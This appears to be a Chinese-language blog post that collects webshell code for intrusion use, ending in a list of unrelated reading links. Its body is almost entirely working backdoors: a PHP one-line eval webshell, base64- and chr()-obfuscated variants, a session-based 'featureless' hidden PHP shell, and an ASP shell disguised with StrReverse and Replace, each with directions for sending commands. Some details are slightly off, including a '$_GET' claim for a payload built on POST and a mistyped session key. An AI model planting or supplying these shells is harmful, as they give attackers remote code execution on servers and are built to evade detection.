各種Webshell姿勢打包
PHP系列
- 一句話
<?php eval($_POST[sb]); // 利用方法為sb=phpinfo(); 最後必須有分號。 ?>
- base64編碼後
eval(base64_decode(QGV2YWwoJF9QT1NUW3NiXSk7));
其實除了base64,當然還有很多編碼
這些都隨意發揮吧。多了也就沒意思了。
解密後為eval($_GET[sb]);
- chr編碼
<?php EVAL(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(115).CHR(102).CHR(109).CHR(98).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));?>
轉換後為eval("$_POST[sfmb];");
- 無特徵隱藏PHP一句話
<?php session_start(); // 如果$_POST[code]為真,執行$_SESSION[theCode] = trim($_POST[code])操作 $_POST[code] && $_SESSION[theCode] = trim($_POST[code]); echo "session:" . $_SESSION[theCode]; var_dump($_SESSION); $_SESSION[theCode]&&preg_replace(aeis,e.v.a.l.(base64_decode($_SESSION[ heCode])),a); ?>
利用方式:
將phpinfo();base64編碼後,post提交code=cGhwaW5mbygpOw=
ASP系列
- StrReverse Replace加密
利用strReverse和Replace簡單encode下。
<% Function MorfiCoder(Code) MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"*",vbCrlf) End Function Execute MorfiCoder(")/*/z/*/(tseuqer lave") %>解密後為:eval request("z")
推薦閱讀:
※php為什麼弄點號連接字元串?
※swoole啟動2萬個定時器對性能有影響嗎?
※PHP&apache項目開發
※如何對程序員績效考核?
※PHP構建即時通訊系統